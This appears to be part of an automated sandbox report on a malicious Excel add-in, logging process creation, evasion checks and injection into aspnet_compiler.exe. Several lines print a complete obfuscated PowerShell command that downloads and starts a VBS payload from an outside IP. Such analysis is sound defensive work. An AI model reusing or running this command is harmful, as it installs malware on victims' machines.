          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: PI#0034250924.xla.xlsxStream path 'Workbook' entropy: 7.99943505066 (max. 8.0)
          Source: F7A30000.0.drStream path 'Workbook' entropy: 7.99950221018 (max. 8.0)
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeMemory allocated: 840000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeMemory allocated: DB0000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AB0101 rdtsc 13_2_00AB0101
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7663Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2301Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.dllJump to dropped file
          Source: C:\Windows\System32\mshta.exe TID: 3516Thread sleep time: -360000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672Thread sleep count: 7663 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672Thread sleep count: 2301 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3732Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\System32\wscript.exe TID: 3908Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe TID: 3932Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3952Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: wscript.exe, 0000000B.00000003.522871057.0000000004E0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +noEcIeL7CjzPCdmIrhnPl7Zk6qLp23vyltQcgjA0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM
          Source: wscript.exe, 0000000B.00000003.525565103.00000000050AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.526234497.00000000050D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RuxePsphgfshM&&&M4UsMV2mvZbaP0haIE&&&XUIpK
          Source: wscript.exe, 0000000B.00000003.517908528.0000000005029000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM;;;2mvZbaP0haIE&&&XUIpK...c6r))Utk5SPicnOErW...turhvQe1X2ZlNF
          Source: wscript.exe, 0000000B.00000003.519965537.0000000004CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Rgns2riR&&&c8bm8hA871r;;;NeMO9uohdR/s;;;2mpCQ7wpEIQzlI...DNS;;;e0Alla+miarL;;;ZCetr6q...Hj9LKAWllOqRdlm//rZOZPfkKo/bZpz9LM;;;+noEcIeL7CjzPCdmIrhnPl7Zk6qLp23vyltQcgjA0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM;;;2mvZbaP0haIE&&&XUIpK...c6rQi'q_
          Source: wscript.exe, 0000000B.00000003.521981172.0000000004DAB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.521688290.0000000004D9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.522157521.0000000004DAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.519965537.0000000004CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Rgns2riR&&&c8bm8hA871r;;;NeMO9uohdR/s;;;2mpCQ7wpEIQzlI...DNS;;;e0Alla+miarL;;;ZCetr6q...Hj9LKAWllOqRdlm//rZOZPfkKo/bZpz9LM;;;+noEcIeL7CjzPCdmIrhnPl7Zk6qLp23vyltQcgjA0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM;;;2mvZbaP0haIE&&&XUIpK...c6r
          Source: wscript.exe, 0000000B.00000003.528495125.0000000000339000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]RuxePsphgfshM&&&M4UsMV2mvZbaP0haIE&&&XUIpK
          Source: wscript.exe, 0000000B.00000003.523365177.000000000502A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.523513557.0000000005049000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.523199784.000000000502A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +noEcIeL7CjzPCdmIrhnPl7Zk6qLp23vyltQcgjA0q1C3w5Ni&&&Z...uxePsphgfshM&&&M4UsM:*'q_
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00AB0101 rdtsc 13_2_00AB0101
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A607AC NtCreateMutant,LdrInitializeThunk,13_2_00A607AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A50080 mov ecx, dword ptr fs:[00000030h]13_2_00A50080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A500EA mov eax, dword ptr fs:[00000030h]13_2_00A500EA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A726F8 mov eax, dword ptr fs:[00000030h]13_2_00A726F8
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Benign windows process drops PE files
          Source: C:\Windows\System32\wscript.exeFile created: temp_exec.exe.11.drJump to dropped file
          Allocates memory in foreign processes
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8B5.tmp" "c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_exec.exe "C:\Users\user\AppData\Local\Temp\temp_exec.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jgigicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagywrelvrzceugicagicagicagicagicagicagicagicagicagicagicatbuvnykvyzevmsw5pdelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtb04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbzannpcxbmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigdkclv3asxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbycsx1aw50icagicagicagicagicagicagicagicagicagicagicagc3zlcgpxbfbzleludfb0ciagicagicagicagicagicagicagicagicagicagicagifbgalb6ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiexjabwn4d09ybiigicagicagicagicagicagicagicagicagicagicagicattkftzvnwyunlicagicagicagicagicagicagicagicagicagicagicagrkpnd0h4zudiicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicriojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta0lje2oc43ljcvmzu2l0lfbmv0ym9va3vwzgf0aw9ulnzicyisiirltny6qvbqrefuqvxfbmv0ym9va3vwzgf0aw9ulnzicyismcwwkttzvgfsvc1ttgvfccgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcrw5ldgjvb2t1cgrhdglvbi52ynmi'+[char]34+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jgigicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagywrelvrzceugicagicagicagicagicagicagicagicagicagicagicatbuvnykvyzevmsw5pdelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtb04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbzannpcxbmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigdkclv3asxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbycsx1aw50icagicagicagicagicagicagicagicagicagicagicagc3zlcgpxbfbzleludfb0ciagicagicagicagicagicagicagicagicagicagicagifbgalb6ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiexjabwn4d09ybiigicagicagicagicagicagicagicagicagicagicagicattkftzvnwyunlicagicagicagicagicagicagicagicagicagicagicagrkpnd0h4zudiicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicriojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta0lje2oc43ljcvmzu2l0lfbmv0ym9va3vwzgf0aw9ulnzicyisiirltny6qvbqrefuqvxfbmv0ym9va3vwzgf0aw9ulnzicyismcwwkttzvgfsvc1ttgvfccgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcrw5ldgjvb2t1cgrhdglvbi52ynmi'+[char]34+'))')))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jgigicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagywrelvrzceugicagicagicagicagicagicagicagicagicagicagicatbuvnykvyzevmsw5pdelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtb04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbzannpcxbmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigdkclv3asxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbycsx1aw50icagicagicagicagicagicagicagicagicagicagicagc3zlcgpxbfbzleludfb0ciagicagicagicagicagicagicagicagicagicagicagifbgalb6ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiexjabwn4d09ybiigicagicagicagicagicagicagicagicagicagicagicattkftzvnwyunlicagicagicagicagicagicagicagicagicagicagicagrkpnd0h4zudiicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicriojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta0lje2oc43ljcvmzu2l0lfbmv0ym9va3vwzgf0aw9ulnzicyisiirltny6qvbqrefuqvxfbmv0ym9va3vwzgf0aw9ulnzicyismcwwkttzvgfsvc1ttgvfccgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcrw5ldgjvb2t1cgrhdglvbi52ynmi'+[char]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jgigicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagywrelvrzceugicagicagicagicagicagicagicagicagicagicagicatbuvnykvyzevmsw5pdelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtb04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbzannpcxbmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigdkclv3asxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbycsx1aw50icagicagicagicagicagicagicagicagicagicagicagc3zlcgpxbfbzleludfb0ciagicagicagicagicagicagicagicagicagicagicagifbgalb6ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiexjabwn4d09ybiigicagicagicagicagicagicagicagicagicagicagicattkftzvnwyunlicagicagicagicagicagicagicagicagicagicagicagrkpnd0h4zudiicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicriojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta0lje2oc43ljcvmzu2l0lfbmv0ym9va3vwzgf0aw9ulnzicyisiirltny6qvbqrefuqvxfbmv0ym9va3vwzgf0aw9ulnzicyismcwwkttzvgfsvc1ttgvfccgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcrw5ldgjvb2t1cgrhdglvbi52ynmi'+[char]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
